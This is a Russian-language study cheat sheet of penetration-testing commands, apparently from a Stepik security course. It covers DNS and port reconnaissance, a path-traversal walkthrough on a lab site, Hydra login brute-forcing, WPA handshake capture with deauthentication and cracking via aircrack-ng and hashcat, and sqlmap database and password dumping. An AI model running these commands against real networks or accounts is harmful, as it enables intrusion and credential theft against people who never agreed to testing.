Безопасность

nslookup

Установка 

apt-get install nslookup

Узнать IP 

nslookup site.ru

Для определения MX-записей введите команду:

nslookup –type=MX site.ru

Определение NS-серверов:

nslookup –type=ns site.ru

Для определения SOA-записи введите команду:

nslookup –type=SOA site.ru

Как изменить интервал ожидания

nslookup –timeout=10 site.ru

Где:

10 ― это количество секунд, за которое должен прийти ответ,

site.ru ― нужное доменное имя.

Dig

dig zonetransfer.me @nsztm2.digi.ninja axfr

whois

whois stepik.org|grep @

Поиск текстовых документов на сайте

site:stepik.org filetype:txt

Сканирование портов

nmap -A  demo.seclab.stepic.org

nmap -Pn demo.seclab.stepic.org

snap install zaproxy --classic

https://www.zaproxy.org/docs/docker/

host

host stepik.org

Загрузка страницы

wget -O - https://stepik.org

curl https://stepik.org

Обход 403

0) Мы также знаем, что на сервере лежит ключ по ссылке http://enter.seclab.stepic.org/keys/key.txt

нам важна часть keys/key.txt 

1) Переходим http://enter.seclab.stepic.org/getpage.php?page=pluto.tmpl

2) Начинаем ходить по директориям, используя боевые ../  http://enter.seclab.stepic.org/getpage.php?page=../pluto.tmpl

НАС ПРЕДУПРЕЖДАЮТ: 

Warning: require_once(go/templates/../pluto.tmpl): failed to open stream: No such file or directory in /opt/www/enter/getpage.php on line 10

Fatal error: require_once(): Failed opening required 'go/templates/../pluto.tmpl' (include_path='.:/usr/share/php:/usr/share/pear') in /opt/www/enter/getpage.php on line 10

3) Изменяем "файл" pluto.tmpl на keys/key.txt

4) Поднимаемся ещё на уровень ../../keys/key.txt 

5) Enter the void!

Закодирование текста в строке и декодирование

Base64

Base64 -D

Hydra

hydra -l ЛОГИН|-L ФАЙЛ] -p ПАРОЛЬ-P ФАЙЛ | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x МИН:МАКС:НАБОРЫ СИМВОЛОВ] [-SOuvVd46] [service://server[:ПОРТ][/OPT]]
Опции:
-S        выполнить SSL соединение
-s ПОРТ   если служба не на порту по умолчанию, то можно задать порт здесь
-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА
-p ПАРОЛЬ  или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА
-x МИНИМУМ:МАКСИМУМ:НАБОР_СИМВОЛОВ  генерация паролей для брутфорса, наберите "-x -h" для помощи
-e nsr    "n" — пробовать с пустым паролем, "s" — логин в качестве пароля и/или "r" — реверс учётных данных
-C ФАЙЛ   формат где "логин:пароль" разделены двоеточиями, вместо опции -L/-P 
-o ФАЙЛ   записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода

sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.107 -s 8000 http-post-form "/sql/sql_1.php:login_2=^USER#&password_2=^PASS^&post_2=post_2:not found"

Anonsurf

AnonSurf — скрипт для включения службы Tor и перенаправления трафика (в том числе DNS запросов), через анонимную распределенную сеть Tor.
mkdir Anonsurf && cd Anonsurf
git clone https://github.com/Und3rf10w/kali-anonsurf.git
sudo ./installer.sh
sudo anonsurf
anonsurf start

Hashcat

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

-m 0 обозначает тип хеша, который мы взламываем (MD5).
-a 0 обозначает атаку по словарю.
-o cracked.txt — указываем выходной файл для взломанных паролей.
target_hashes.txt — наш входной файл хэшей, которые необходимо взломать.
/usr/share/wordlists/rockyou.txt — это абсолютный путь к файлу списка слов для этой атаки по словарю.

echo -n “Password” | md5sum | tr -d ” -” >> target_hashes.txt
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

NMap

nmap -v -T5 -p 0-65535 -A 192.168.0.110 -oA meta -sV -o

Aircrack-ng


Просмотреть список адаптеров
ifconfig

Необходимо перевести WiFi-адпатер в режим монитора. 
sudo airmon-ng start wln0
sudo kill [pid]

Запустите airodump-ng для отображения всех сетей Wi-Fi.
sudo airdump-ng  wln0

Команда помимо прочего отобразит BSSID (мак-адрес), мощность сигнала (PWR) и CH (канал сети).
Скопируйте BSSID и CH целевой сети.
sudo airodump-ng -c 11 --bssid A6:0C:ID:ID:ID:ID -w filename wln0mon

Запустите деаутентификации клиентов выбранной сети в новом терминале:
sudo aireplay-ng -0 1 -a WIFI:BSSID -c DEVICE:BSSID wln0mon

Вернитесь к предыдущему окну консоли, в котором появится сообщение о перехвате рукопожатие WPA.
Чтобы остановить процесс, нажмите сочетание клавиш CTRL + C.

Теперь у нас есть файл filename.cap. Мы можем либо использовать aircrack-ng для взлома пароля, либо конвертировать filename.cap в hash.hc22000, а затем взломать хэш с помощью hashcat.

Для взлома с помощью aircrack-ng используйте следующую команду.

aircrack-ng -w rockyou.txt -b BSSID filename.cap
Атака по словарю (список слов) с использованием популярного словаря rockyou.txt

Брутфорс с использованием hashcat:
hashcat -m 22000 hash.hc22000 rockyou.txt

hahscat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
Приведенная выше команда предназначена для перебора 8-значного числового пароля.


SQLMap

sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -dbs
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead --tables 
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --dump 
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --columns
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --passwords
sqlmap -u "http://192.168.0.107:8000" --data="login=user&password=user&send=Submit" --risk=2 --level=2 --dbs

Авторизация с ssh

ssh-keygen -t rsa -b 2048
ssh-copy-id username@remote_host
ssh -i /path/to/private/key username@remote_host

Признаки "плохого кода"

Кратко рассмотрим 12 признаков, когда код можно улучшить: 1. Duplicated Code  — иногда повторяющийся код не всегда несет в себе пользу. Выде...